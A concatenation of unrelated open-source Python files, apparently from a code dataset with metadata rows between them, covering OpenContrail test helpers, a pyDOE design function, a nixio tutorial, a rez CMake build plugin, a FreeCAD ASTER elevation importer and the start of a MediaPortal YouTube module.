vn_obj.clear_pending_updates()
return vn_obj
# end create_virtual_network
def _create_service(self, vn_list, si_name, auto_policy,
create_right_port=True, **kwargs):
sa_set = None
if kwargs.get('service_virtualization_type') == 'physical-device':
pr = PhysicalRouter(si_name)
self._vnc_lib.physical_router_create(pr)
sa_set = ServiceApplianceSet('sa_set-'+si_name)
self._vnc_lib.service_appliance_set_create(sa_set)
sa = ServiceAppliance('sa-'+si_name, parent_obj=sa_set)
for if_type, _ in vn_list:
attr = ServiceApplianceInterfaceType(interface_type=if_type)
pi = PhysicalInterface('pi-'+si_name+if_type, parent_obj=pr)
self._vnc_lib.physical_interface_create(pi)
sa.add_physical_interface(pi, attr)
self._vnc_lib.service_appliance_create(sa)
sti = [ServiceTemplateInterfaceType(k) for k, _ in vn_list]
st_prop = ServiceTemplateType(
flavor='medium',
image_name='junk',
ordered_interfaces=True,
interface_type=sti, **kwargs)
service_template = ServiceTemplate(
name=si_name + 'template',
service_template_properties=st_prop)
if sa_set:
service_template.add_service_appliance_set(sa_set)
self._vnc_lib.service_template_create(service_template)
scale_out = ServiceScaleOutType()
if kwargs.get('service_mode') in ['in-network', 'in-network-nat']:
if_list = [ServiceInstanceInterfaceType(virtual_network=vn)
for _, vn in vn_list]
si_props = ServiceInstanceType(auto_policy=auto_policy,
interface_list=if_list,
scale_out=scale_out)
else:
if_list = [ServiceInstanceInterfaceType(),
ServiceInstanceInterfaceType()]
si_props = ServiceInstanceType(interface_list=if_list,
scale_out=scale_out)
service_instance = ServiceInstance(
name=si_name, service_instance_properties=si_props)
service_instance.add_service_template(service_template)
self._vnc_lib.service_instance_create(service_instance)
if kwargs.get('version') == 2:
proj = Project()
pt = PortTuple('pt-'+si_name, parent_obj=service_instance)
self._vnc_lib.port_tuple_create(pt)
for if_type, vn_name in vn_list:
if if_type == 'right' and not create_right_port:
continue
port = VirtualMachineInterface(si_name+if_type, parent_obj=proj)
vmi_props = VirtualMachineInterfacePropertiesType(
service_interface_type=if_type)
vn_obj = self._vnc_lib.virtual_network_read(fq_name_str=vn_name)
port.set_virtual_machine_interface_properties(vmi_props)
port.add_virtual_network(vn_obj)
port.add_port_tuple(pt)
self._vnc_lib.virtual_machine_interface_create(port)
# Let a chance to the API to create iip for the vmi of the pt
# before creating the si and the schema allocates an iip
# address to the service chain
gevent.sleep(0.1)
return service_instance.get_fq_name_str()
def create_network_policy(self, vn1, vn2, service_list=None, mirror_service=None,
auto_policy=False, create_right_port = True, **kwargs):
vn1_name = vn1 if isinstance(vn1, basestring) else vn1.get_fq_name_str()
vn2_name = vn2 if isinstance(vn2, basestring) else vn2.get_fq_name_str()
addr1 = AddressType(virtual_network=vn1_name, subnet=kwargs.get('subnet_1'))
addr2 = AddressType(virtual_network=vn2_name, subnet=kwargs.get('subnet_2'))
port = PortType(-1, 0)
service_name_list = []
si_list = service_list or []
if service_list:
for service in si_list:
service_name_list.append(self._create_service(
[('left', vn1_name), ('right', vn2_name)], service,
auto_policy, create_right_port, **kwargs))
if mirror_service:
mirror_si = self._create_service(
[('left', vn1_name), ('right', vn2_name)], mirror_service, False,
service_mode='transparent', service_type='analyzer')
action_list = ActionListType()
if mirror_service:
mirror = MirrorActionType(analyzer_name=mirror_si)
action_list.mirror_to=mirror
if service_name_list:
action_list.apply_service=service_name_list
else:
action_list.simple_action='pass'
prule = PolicyRuleType(direction="<>", protocol="any",
src_addresses=[addr1], dst_addresses=[addr2],
src_ports=[port], dst_ports=[port],
action_list=action_list)
pentry = PolicyEntriesType([prule])
np = NetworkPolicy(str(uuid.uuid4()), network_policy_entries=pentry)
if auto_policy:
return np
self._vnc_lib.network_policy_create(np)
return np
# end create_network_policy
def create_logical_router(self, name, nb_of_attached_networks=1, **kwargs):
lr = LogicalRouter(name, **kwargs)
vns = []
vmis = []
iips = []
for idx in range(nb_of_attached_networks):
# Virtual Network
vn = self.create_virtual_network('%s-network%d' % (name, idx),
'10.%d.0.0/24' % idx)
vns.append(vn)
# Virtual Machine Interface
vmi_name = '%s-network%d-vmi' % (name, idx)
vmi = VirtualMachineInterface(
vmi_name, parent_type='project',
fq_name=['default-domain', 'default-project', vmi_name])
vmi.set_virtual_machine_interface_device_owner(
'network:router_interface')
vmi.add_virtual_network(vn)
self._vnc_lib.virtual_machine_interface_create(vmi)
lr.add_virtual_machine_interface(vmi)
vmis.append(vmi)
# Instance IP
gw_ip = vn.get_network_ipam_refs()[0]['attr'].ipam_subnets[0].\
default_gateway
subnet_uuid = vn.get_network_ipam_refs()[0]['attr'].\
ipam_subnets[0].subnet_uuid
iip = InstanceIp(name='%s-network%d-iip' % (name, idx))
iip.set_subnet_uuid(subnet_uuid)
iip.set_virtual_machine_interface(vmi)
iip.set_virtual_network(vn)
iip.set_instance_ip_family('v4')
iip.set_instance_ip_address(gw_ip)
self._vnc_lib.instance_ip_create(iip)
iips.append(iip)
self._vnc_lib.logical_router_create(lr)
return lr, vns, vmis, iips
def _security_group_rule_build(self, rule_info, sg_fq_name_str):
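        # rule_info is expected to carry these keys (values are illustrative):
        #   {'protocol': 'tcp', 'port_min': 22, 'port_max': 22,
        #    'direction': 'ingress', 'ip_prefix': '10.0.0.0/24',
        #    'ether_type': 'IPv4'}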
protocol = rule_info['protocol']
port_min = rule_info['port_min'] or 0
port_max = rule_info['port_max'] or 65535
direction = rule_info['direction'] or 'ingress'
ip_prefix = rule_info['ip_prefix']
ether_type = rule_info['ether_type']
if ip_prefix:
cidr = ip_prefix.split('/')
pfx = cidr[0]
pfx_len = int(cidr[1])
endpt = [AddressType(subnet=SubnetType(pfx, pfx_len))]
else:
endpt = [AddressType(security_group=sg_fq_name_str)]
local = None
remote = None
if direction == 'ingress':
dir = '>'
local = endpt
remote = [AddressType(security_group='local')]
else:
dir = '>'
remote = endpt
local = [AddressType(security_group='local')]
if not protocol:
protocol = 'any'
if protocol.isdigit():
protocol = int(protocol)
if protocol < 0 or protocol > 255:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
else:
if protocol not in ['any', 'tcp', 'udp', 'icmp', 'icmp6']:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
if not ip_prefix and not sg_fq_name_str:
if not ether_type:
ether_type = 'IPv4'
sgr_uuid = str(uuid.uuid4())
rule = PolicyRuleType(rule_uuid=sgr_uuid, direction=dir,
protocol=protocol,
src_addresses=local,
src_ports=[PortType(0, 65535)],
dst_addresses=remote,
dst_ports=[PortType(port_min, port_max)],
ethertype=ether_type)
return rule
#end _security_group_rule_build
def _security_group_rule_append(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
rules = PolicyEntriesType([sg_rule])
else:
for sgr in rules.get_policy_rule() or []:
sgr_copy = copy.copy(sgr)
sgr_copy.rule_uuid = sg_rule.rule_uuid
if sg_rule == sgr_copy:
raise Exception('SecurityGroupRuleExists %s' % sgr.rule_uuid)
rules.add_policy_rule(sg_rule)
sg_obj.set_security_group_entries(rules)
#end _security_group_rule_append
def _security_group_rule_remove(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
            raise Exception('SecurityGroupRuleNotExists %s' % sg_rule.rule_uuid)
else:
for sgr in rules.get_policy_rule() or []:
if sgr.rule_uuid == sg_rule.rule_uuid:
rules.delete_policy_rule(sgr)
sg_obj.set_security_group_entries(rules)
return
raise Exception('SecurityGroupRuleNotExists %s' % sg_rule.rule_uuid)
    #end _security_group_rule_remove
# end TestCase
class ErrorInterceptingLogger(sandesh_logger.SandeshLogger):
_exceptions = []
_other_errors = []
@classmethod
def register_exception(cls, msg, *args, **kwargs):
if 'traceback' in msg.lower():
cls._exceptions.append((msg, args, kwargs))
return True
return False
@classmethod
def register_error(cls, msg, *args, **kwargs):
if not cls.register_exception(msg, *args, **kwargs):
cls._other_errors.append((msg, args, kwargs))
@classmethod
def get_exceptions(cls):
return list(cls._exceptions)
@classmethod
def get_other_errors(cls):
return list(cls._other_errors)
@classmethod
def reset(cls):
cls._exceptions, cls._other_errors = [], []
@classmethod
def get_qualified_name(cls):
return '{module_name}.{class_name}'.format(
module_name=cls.__module__, class_name=cls.__name__)
class LoggerWrapper(object):
def __init__(self, logger):
self._logger = logger
def __getattr__(self, item):
return getattr(self._logger, item)
def error(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.critical(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.exception(msg, *args, **kwargs)
def log(self, lvl, msg, *args, **kwargs):
ErrorInterceptingLogger.register_exception(
msg, *args, **kwargs)
return self._logger.log(lvl, msg, *args, **kwargs)
def __init__(self, *args, **kwargs):
super(ErrorInterceptingLogger, self).__init__(*args, **kwargs)
self._logger = ErrorInterceptingLogger.LoggerWrapper(
self._logger)
| apache-2.0 | -2,208,394,981,384,609,800 | 37.410698 | 121 | 0.594897 | false |
lepy/phuzzy | phuzzy/contrib/pydoe/doe_composite.py | 1 | 6172 | """
This code was originally published by the following individuals for use with
Scilab:
Copyright (C) 2012 - 2013 - Michael Baudin
Copyright (C) 2012 - Maria Christopoulou
Copyright (C) 2010 - 2011 - INRIA - Michael Baudin
Copyright (C) 2009 - Yann Collette
Copyright (C) 2009 - CEA - Jean-Marc Martinez
website: forge.scilab.org/index.php/p/scidoe/sourcetree/master/macros
Much thanks goes to these individuals. It has been converted to Python by
Abraham Lee.
"""
# import numpy as np
from phuzzy.contrib.pydoe.doe_factorial import ff2n
from phuzzy.contrib.pydoe.doe_star import star
from phuzzy.contrib.pydoe.doe_union import union
from phuzzy.contrib.pydoe.doe_repeat_center import repeat_center
__all__ = ['ccdesign']
def ccdesign(n, center=(4, 4), alpha='orthogonal', face='circumscribed'):
"""
Central composite design
Parameters
----------
n : int
The number of factors in the design.
Optional
--------
center : int array
A 1-by-2 array of integers, the number of center points in each block
of the design. (Default: (4, 4)).
alpha : str
A string describing the effect of alpha has on the variance. ``alpha``
can take on the following values:
1. 'orthogonal' or 'o' (Default)
2. 'rotatable' or 'r'
face : str
The relation between the start points and the corner (factorial) points.
There are three options for this input:
1. 'circumscribed' or 'ccc': This is the original form of the central
composite design. The star points are at some distance ``alpha``
from the center, based on the properties desired for the design.
The start points establish new extremes for the low and high
settings for all factors. These designs have circular, spherical,
or hyperspherical symmetry and require 5 levels for each factor.
Augmenting an existing factorial or resolution V fractional
factorial design with star points can produce this design.
2. 'inscribed' or 'cci': For those situations in which the limits
specified for factor settings are truly limits, the CCI design
uses the factors settings as the star points and creates a factorial
or fractional factorial design within those limits (in other words,
a CCI design is a scaled down CCC design with each factor level of
the CCC design divided by ``alpha`` to generate the CCI design).
This design also requires 5 levels of each factor.
3. 'faced' or 'ccf': In this design, the star points are at the center
of each face of the factorial space, so ``alpha`` = 1. This
variety requires 3 levels of each factor. Augmenting an existing
factorial or resolution V design with appropriate star points can
also produce this design.
Notes
-----
- Fractional factorial designs are not (yet) available here.
- 'ccc' and 'cci' can be rotatable design, but 'ccf' cannot.
- If ``face`` is specified, while ``alpha`` is not, then the default value
of ``alpha`` is 'orthogonal'.
Returns
-------
mat : 2d-array
The design matrix with coded levels -1 and 1
Example
-------
::
>>> ccdesign(3)
array([[-1. , -1. , -1. ],
[ 1. , -1. , -1. ],
[-1. , 1. , -1. ],
[ 1. , 1. , -1. ],
[-1. , -1. , 1. ],
[ 1. , -1. , 1. ],
[-1. , 1. , 1. ],
[ 1. , 1. , 1. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[-1.82574186, 0. , 0. ],
[ 1.82574186, 0. , 0. ],
[ 0. , -1.82574186, 0. ],
[ 0. , 1.82574186, 0. ],
[ 0. , 0. , -1.82574186],
[ 0. , 0. , 1.82574186],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ],
[ 0. , 0. , 0. ]])
"""
# Check inputs
    if not (isinstance(n, int) and n > 1):
raise Exception('"n" must be an integer greater than 1.')
if not alpha.lower() in ('orthogonal', 'o', 'rotatable',
'r'):
raise Exception('Invalid value for "alpha": {:}'.format(alpha))
if not face.lower() in ('circumscribed', 'ccc', 'inscribed', 'cci',
'faced', 'ccf'):
raise Exception('Invalid value for "face": {:}'.format(face))
try:
nc = len(center)
except:
raise TypeError('Invalid value for "center": {:}. Expected a 1-by-2 array.'.format(center))
else:
if nc != 2:
raise ValueError('Invalid number of values for "center" (expected 2, but got {:})'.format(nc))
# Orthogonal Design
if alpha.lower() in ('orthogonal', 'o'):
H2, a = star(n, alpha='orthogonal', center=center)
# Rotatable Design
if alpha.lower() in ('rotatable', 'r'):
H2, a = star(n, alpha='rotatable')
# Inscribed CCD
if face.lower() in ('inscribed', 'cci'):
H1 = ff2n(n)
H1 = H1 / a # Scale down the factorial points
H2, a = star(n)
# Faced CCD
if face.lower() in ('faced', 'ccf'):
H2, a = star(n) # Value of alpha is always 1 in Faced CCD
H1 = ff2n(n)
# Circumscribed CCD
if face.lower() in ('circumscribed', 'ccc'):
H1 = ff2n(n)
C1 = repeat_center(n, center[0])
C2 = repeat_center(n, center[1])
H1 = union(H1, C1)
H2 = union(H2, C2)
H = union(H1, H2)
return H
| mit | 4,254,063,885,363,651,600 | 36.634146 | 106 | 0.516202 | false |
stoewer/nixpy | docs/source/examples/irregularlySampledData.py | 1 | 2147 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright © 2014 German Neuroinformatics Node (G-Node)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted under the terms of the BSD License. See
LICENSE file in the root of the Project.
Author: Jan Grewe <jan.grewe@g-node.org>
This tutorial shows how irregularly sampled data is stored in nix-files.
See https://github.com/G-node/nix/wiki for more information.
"""
import nixio as nix
import numpy as np
import matplotlib.pylab as plt
def create_data(duration, interval):
    times = np.around(np.cumsum(np.random.poisson(interval*1000, int(1.5*duration/interval)))/1000., 3)
times = times[times <= duration]
x = np.arange(0, times[-1] * 2 * np.pi, 0.001)
y = np.sin(5 * x)
return times, y[np.asarray(times / 0.001 * 2 * np.pi, dtype=int)]
def plot_data(data_array):
x_axis = data_array.dimensions[0]
x = list(x_axis.ticks)
y = data_array.data
plt.plot(x, y, marker='o', color='dodgerblue')
plt.xlabel(x_axis.label + " [" + x_axis.unit + "]")
plt.ylabel(data_array.label + " [" + data_array.unit + "]")
plt.title(data_array.name)
    plt.xlim([0, x[-1]])
plt.ylim(np.min(y)*1.1, np.max(y)*1.1)
plt.show()
if __name__ == "__main__":
# fake some data
times, y = create_data(1.0, 0.02)
# create a new file overwriting any existing content
file_name = 'irregular_data_example.h5'
file = nix.File.open(file_name, nix.FileMode.Overwrite)
# create a 'Block' that represents a grouping object. Here, the recording session.
# it gets a name and a type
block = file.create_block("block name", "nix.session")
# create a 'DataArray' to take the data, add some information about the signal
data = block.create_data_array("sinewave", "nix.irregular_sampled", data=y)
data.unit = "mV"
data.label = "voltage"
# add a descriptor for the xaxis
dim = data.append_range_dimension(times)
dim.unit = "s"
dim.label = "time"
# let's plot the data from the stored information
plot_data(data)
file.close()
| bsd-3-clause | 2,646,880,914,750,909,000 | 31.029851 | 98 | 0.659832 | false |
mikrosimage/rez | src/rezplugins/build_system/cmake.py | 1 | 11253 | """
CMake-based build system
"""
from rez.build_system import BuildSystem
from rez.build_process_ import BuildType
from rez.resolved_context import ResolvedContext
from rez.exceptions import BuildSystemError
from rez.util import create_forwarding_script
from rez.packages_ import get_developer_package
from rez.utils.platform_ import platform_
from rez.config import config
from rez.backport.shutilwhich import which
from rez.vendor.schema.schema import Or
from rez.shells import create_shell
import functools
import os.path
import sys
import os
class RezCMakeError(BuildSystemError):
pass
class CMakeBuildSystem(BuildSystem):
"""The CMake build system.
The 'cmake' executable is run within the build environment. Rez supplies a
library of cmake macros in the 'cmake_files' directory; these are added to
cmake's searchpath and are available to use in your own CMakeLists.txt
file.
The following CMake variables are available:
- REZ_BUILD_TYPE: One of 'local', 'central'. Describes whether an install
is going to the local packages path, or the release packages path.
- REZ_BUILD_INSTALL: One of 0 or 1. If 1, an installation is taking place;
if 0, just a build is occurring.
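
    A minimal CMakeLists.txt sketch using these variables (illustrative only;
    the project and file names are placeholders, not part of rez)::

        cmake_minimum_required(VERSION 2.8)
        project(my_package)
        if(REZ_BUILD_INSTALL)
            install(FILES data/config.yaml DESTINATION .)
        endif()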
"""
build_systems = {'eclipse': "Eclipse CDT4 - Unix Makefiles",
'codeblocks': "CodeBlocks - Unix Makefiles",
'make': "Unix Makefiles",
'nmake': "NMake Makefiles",
'xcode': "Xcode"}
build_targets = ["Debug", "Release", "RelWithDebInfo"]
schema_dict = {
"build_target": Or(*build_targets),
"build_system": Or(*build_systems.keys()),
"cmake_args": [basestring],
"cmake_binary": Or(None, basestring),
"make_binary": Or(None, basestring)}
@classmethod
def name(cls):
return "cmake"
@classmethod
def child_build_system(cls):
return "make"
@classmethod
def is_valid_root(cls, path):
return os.path.isfile(os.path.join(path, "CMakeLists.txt"))
@classmethod
def bind_cli(cls, parser):
settings = config.plugins.build_system.cmake
parser.add_argument("--bt", "--build-target", dest="build_target",
type=str, choices=cls.build_targets,
default=settings.build_target,
help="set the build target (default: %(default)s).")
parser.add_argument("--bs", "--build-system", dest="build_system",
type=str, choices=cls.build_systems.keys(),
default=settings.build_system,
help="set the cmake build system (default: %(default)s).")
def __init__(self, working_dir, opts=None, write_build_scripts=False,
verbose=False, build_args=[], child_build_args=[]):
super(CMakeBuildSystem, self).__init__(
working_dir,
opts=opts,
write_build_scripts=write_build_scripts,
verbose=verbose,
build_args=build_args,
child_build_args=child_build_args)
self.settings = self.package.config.plugins.build_system.cmake
self.build_target = (opts and opts.build_target) or \
self.settings.build_target
self.cmake_build_system = (opts and opts.build_system) or \
self.settings.build_system
if self.cmake_build_system == 'xcode' and platform_.name != 'osx':
raise RezCMakeError("Generation of Xcode project only available "
"on the OSX platform")
def build(self, context, variant, build_path, install_path, install=False,
build_type=BuildType.local):
def _pr(s):
if self.verbose:
print s
# find cmake binary
if self.settings.cmake_binary:
exe = self.settings.cmake_binary
else:
exe = context.which("cmake", fallback=True)
if not exe:
raise RezCMakeError("could not find cmake binary")
found_exe = which(exe)
if not found_exe:
raise RezCMakeError("cmake binary does not exist: %s" % exe)
sh = create_shell()
# assemble cmake command
cmd = [found_exe, "-d", self.working_dir]
cmd += (self.settings.cmake_args or [])
cmd += (self.build_args or [])
cmd.append("-DCMAKE_INSTALL_PREFIX=%s" % install_path)
cmd.append("-DCMAKE_MODULE_PATH=%s" %
sh.get_key_token("CMAKE_MODULE_PATH").replace('\\', '/'))
cmd.append("-DCMAKE_BUILD_TYPE=%s" % self.build_target)
cmd.append("-DREZ_BUILD_TYPE=%s" % build_type.name)
cmd.append("-DREZ_BUILD_INSTALL=%d" % (1 if install else 0))
cmd.extend(["-G", self.build_systems[self.cmake_build_system]])
if config.rez_1_cmake_variables and \
not config.disable_rez_1_compatibility and \
build_type == BuildType.central:
cmd.append("-DCENTRAL=1")
# execute cmake within the build env
_pr("Executing: %s" % ' '.join(cmd))
        if not os.path.isabs(build_path):
build_path = os.path.join(self.working_dir, build_path)
build_path = os.path.realpath(build_path)
callback = functools.partial(self._add_build_actions,
context=context,
package=self.package,
variant=variant,
build_type=build_type)
# run the build command and capture/print stderr at the same time
retcode, _, _ = context.execute_shell(command=cmd,
block=True,
cwd=build_path,
actions_callback=callback)
ret = {}
if retcode:
ret["success"] = False
return ret
if self.write_build_scripts:
# write out the script that places the user in a build env, where
# they can run make directly themselves.
build_env_script = os.path.join(build_path, "build-env")
create_forwarding_script(build_env_script,
module=("build_system", "cmake"),
func_name="_FWD__spawn_build_shell",
working_dir=self.working_dir,
build_dir=build_path,
variant_index=variant.index)
ret["success"] = True
ret["build_env_script"] = build_env_script
return ret
# assemble make command
if self.settings.make_binary:
cmd = [self.settings.make_binary]
else:
cmd = ["make"]
cmd += (self.child_build_args or [])
# nmake has no -j
if self.settings.make_binary != 'nmake':
if not any(x.startswith("-j") for x in (self.child_build_args or [])):
n = variant.config.build_thread_count
cmd.append("-j%d" % n)
# execute make within the build env
_pr("\nExecuting: %s" % ' '.join(cmd))
retcode, _, _ = context.execute_shell(command=cmd,
block=True,
cwd=build_path,
actions_callback=callback)
if not retcode and install and "install" not in cmd:
cmd.append("install")
# execute make install within the build env
_pr("\nExecuting: %s" % ' '.join(cmd))
retcode, _, _ = context.execute_shell(command=cmd,
block=True,
cwd=build_path,
actions_callback=callback)
ret["success"] = (not retcode)
return ret
@staticmethod
def _add_build_actions(executor, context, package, variant, build_type):
settings = package.config.plugins.build_system.cmake
cmake_path = os.path.join(os.path.dirname(__file__), "cmake_files")
template_path = os.path.join(os.path.dirname(__file__), "template_files")
executor.env.CMAKE_MODULE_PATH.append(cmake_path.replace('\\', '/'))
executor.env.REZ_BUILD_DOXYFILE = os.path.join(template_path, 'Doxyfile')
executor.env.REZ_BUILD_VARIANT_INDEX = variant.index or 0
executor.env.REZ_BUILD_THREAD_COUNT = package.config.build_thread_count
# build always occurs on a filesystem package, thus 'filepath' attribute
# exists. This is not the case for packages in general.
executor.env.REZ_BUILD_PROJECT_FILE = package.filepath
executor.env.REZ_BUILD_PROJECT_VERSION = str(package.version)
executor.env.REZ_BUILD_PROJECT_NAME = package.name
executor.env.REZ_BUILD_PROJECT_DESCRIPTION = \
(package.description or '').strip()
executor.env.REZ_BUILD_REQUIRES_UNVERSIONED = \
' '.join(x.name for x in context.requested_packages(True))
executor.env.REZ_BUILD_INSTALL_PYC = '1' if settings.install_pyc else '0'
if config.rez_1_environment_variables and \
not config.disable_rez_1_compatibility and \
build_type == BuildType.central:
executor.env.REZ_IN_REZ_RELEASE = 1
def _FWD__spawn_build_shell(working_dir, build_dir, variant_index):
# This spawns a shell that the user can run 'make' in directly
context = ResolvedContext.load(os.path.join(build_dir, "build.rxt"))
package = get_developer_package(working_dir)
variant = package.get_variant(variant_index)
config.override("prompt", "BUILD>")
callback = functools.partial(CMakeBuildSystem._add_build_actions,
context=context,
package=package,
variant=variant,
build_type=BuildType.local)
retcode, _, _ = context.execute_shell(block=True,
cwd=build_dir,
actions_callback=callback)
sys.exit(retcode)
def register_plugin():
return CMakeBuildSystem
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | 6,769,576,808,462,202,000 | 41.146067 | 86 | 0.570603 | false |
microelly2/geodata | geodat/import_aster.py | 1 | 5208 | ''' geodat import AST (gdal)'''
# -*- coding: utf-8 -*-
#-------------------------------------------------
#-- geodat import AST (gdal)
#--
#-- microelly 2016 v 0.1
#--
#-- GNU Lesser General Public License (LGPL)
#-------------------------------------------------
#http://geoinformaticstutorial.blogspot.de/2012/09/reading-raster-data-with-python-and-gdal.html
#http://forum.freecadweb.org/viewtopic.php?f=8&t=17647&start=10#p139201
# the ast file is expected in ~/.FreeCAD/geodat/AST
# FreeCAD.ConfigGet("UserAppData") +'/geodat/AST/ASTGTM2_' + ff +'_dem.tif'
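# Worked example (derived from import_ast() below, illustrative): for the
# default arguments b=50.26, l=11.39 the tile indices are floor(b)=50 and
# floor(l)=11, giving ff="N50E011" and the expected file
# ~/.FreeCAD/geodat/AST/ASTGTM2_N50E011_dem.tif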
'''
ASTER GDEM Policy Agreements
I agree to redistribute the ASTER GDEM *only* to individuals within my organization or project of intended use or in response to disasters in support of the GEO Disaster Theme.
When presenting or publishing ASTER GDEM data, I agree to include "ASTER GDEM is a product of METI and NASA."
Because there are known inaccuracies and artifacts in the data set, please use the product with awareness of its limitations. The data are provided "as is" and neither NASA nor METI/ERSDAC will be responsible for any damages resulting from use of the data.
'''
from geodat.say import *
import geodat.transversmercator
from geodat.transversmercator import TransverseMercator
import geodat.import_xyz
import geodat.geodat_lib
# apt-get install python-gdal
import gdal
from gdalconst import *
import WebGui
import Points
def import_ast(b=50.26,l=11.39):
'''get the data from a downloaded file
the file is expected in FreeCAD.ConfigGet("UserAppData") + '/geodat/AST/'
with the common filename for lat/lon parameters
example .../.FreeCAD/geodat/AST/ASTGTM2_N51E010_dem.tif
'''
bs=np.floor(b)
ls=np.floor(l)
# the ast dataset
ff="N%02dE%03d" % (int(bs),int(ls))
fn=FreeCAD.ConfigGet("UserAppData") +'/geodat/AST/ASTGTM2_' + ff +'_dem.tif'
print(fn)
'''
fn='/home/microelly2/FCB/b217_heightmaps/tandemx_daten/Chile-Chuquicatmata.tif'
b=-22.3054705
l=-68.9259643
bs=np.floor(b)
ls=np.floor(l)
print(fn)
'''
dataset = gdal.Open(fn, GA_ReadOnly)
if dataset == None:
msg="\nProblem cannot open " + fn + "\n"
FreeCAD.Console.PrintError(msg)
errorDialog(msg)
return
cols=dataset.RasterXSize
rows=dataset.RasterYSize
geotransform = dataset.GetGeoTransform()
originX = geotransform[0]
originY = geotransform[3]
pixelWidth = geotransform[1]
pixelHeight = geotransform[5]
band = dataset.GetRasterBand(1)
data = band.ReadAsArray(0, 0, cols, rows)
#data.shape -> 3601 x 3601 secs
# erfurt 51,11
#data[0,0]
# zeitz 51,12
#data[3600,0]
# windischletten(zapfendorf) 50,11
#data[0,3600]
# troestau fichtelgebirge 50,12
#data[3600,3600]
px=int(round((bs+1-b)*3600))
py=int(round((l-ls)*3600))
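# Worked example (illustrative): the tile holds one sample per arc-second,
# hence the factor 3600. For b=50.368209, l=11.2016135 (the default offered
# in the dialog below): px = round((51-50.368209)*3600) = 2274 and
# py = round((11.2016135-11)*3600) = 726.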
pts=[]
d=70
d1=20
d2=50
d1=d
d2=d
tm=TransverseMercator()
tm.lat=b
tm.lon=l
center=tm.fromGeographic(tm.lat,tm.lon)
z0= data[px,py] # relative height to origin px,py
for x in range(px-d1,px+d1):
for y in range(py-d2,py+d2):
ll=tm.fromGeographic(bs+1-1.0/3600*x,ls+1.0/3600*y)
pt=FreeCAD.Vector(ll[0]-center[0],ll[1]-center[1], 1000.0* (data[x,y]-z0))
pts.append(pt)
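# Note (assumption, added for clarity): each point stores the height of the
# cell relative to the origin cell z0; the factor 1000.0 presumably converts
# the GDEM metres into FreeCAD's internal millimetre unit.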
# display the point cloud
p=Points.Points(pts)
Points.show(p)
return pts
s6='''
MainWindow:
VerticalLayout:
id:'main'
# setFixedHeight: 600
setFixedWidth: 600
move: PySide.QtCore.QPoint(3000,100)
QtGui.QLabel:
setText:"C O N F I G U R A T I O N"
QtGui.QLabel:
QtGui.QLineEdit:
id: 'bl'
# zeyerner wand **
#(50.2570152,11.3818337)
# outdoor inn *
#(50.3737109,11.1891891)
# roethen **
#(50.3902794,11.157629)
# kreuzung huettengrund nach judenbach ***
#(50.368209,11.2016135)
setText:"50.368209,11.2016135"
# coburg zentrum
setText:"50.2639926,10.9686946"
QtGui.QPushButton:
setText: "Create height models"
clicked.connect: app.runbl
QtGui.QPushButton:
setText: "show Map"
clicked.connect: app.showMap
'''
## the gui backend
class MyApp(object):
## create the height model
def runbl(self):
bl=self.root.ids['bl'].text()
spli=bl.split(',')
b=float(spli[0])
l=float(spli[1])
s=15
import_heights(float(b),float(l),float(s))
## display the location in openstreetmap
def showMap(self):
bl=self.root.ids['bl'].text()
spli=bl.split(',')
b=float(spli[0])
l=float(spli[1])
s=15
WebGui.openBrowser( "http://www.openstreetmap.org/#map=16/"+str(b)+'/'+str(l))
## the dialog to import a gdal file
def mydialog():
'''the dialog to import a gdal file'''
app=MyApp()
import geodat
import geodat.miki as gmiki
miki=gmiki.Miki()
miki.app=app
app.root=miki
miki.run(s6)
FreeCAD.mm=miki
return miki
## import heights using import_xyz
def import_heights(b,l,s):
ts=time.time()
pcl=import_ast(b,l)
pts=pcl
ff="N" + str(b) + " E" + str(l)
nurbs=geodat.import_xyz.suv2(ff,pts,u=0,v=0,d=140,la=140,lb=140)
te=time.time()
print ("time to create models:",te-ts)
fn=geodat.geodat_lib.genSizeImage(size=512)
# geodat.geodat_lib.addImageTexture(nurbs,fn,scale=(8,3))
nurbs.ViewObject.Selectable = False
## test start and hide the dialog
def runtest():
m=mydialog()
m.objects[0].hide()
if __name__ == '__main__':
runtest()
def importASTER():
mydialog()
| lgpl-3.0 | -4,922,200,730,300,529,000 | 20.520661 | 256 | 0.679724 | false |
schleichdi2/OpenNfr_E2_Gui-6.0 | lib/python/Plugins/Extensions/MediaPortal/additions/mediatheken/youtube.py | 1 | 66866 | # -*- coding: utf-8 -*-
import json
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
from Plugins.Extensions.MediaPortal.resources.choiceboxext import ChoiceBoxExt
from Plugins.Extensions.MediaPortal.resources.keyboardext import VirtualKeyBoardExt
from Plugins.Extensions.MediaPortal.resources.youtubeplayer import YoutubePlayer
from Plugins.Extensions.MediaPortal.resources.menuhelper import MenuHelper
from Plugins.Extensions.MediaPortal.resources.twagenthelper import twAgentGetPage
config.mediaportal.yt_param_regionid_idx = ConfigInteger(default = 2)
config.mediaportal.yt_param_time_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_meta_idx = ConfigInteger(default = 1)
config.mediaportal.yt_paramListIdx = ConfigInteger(default = 0)
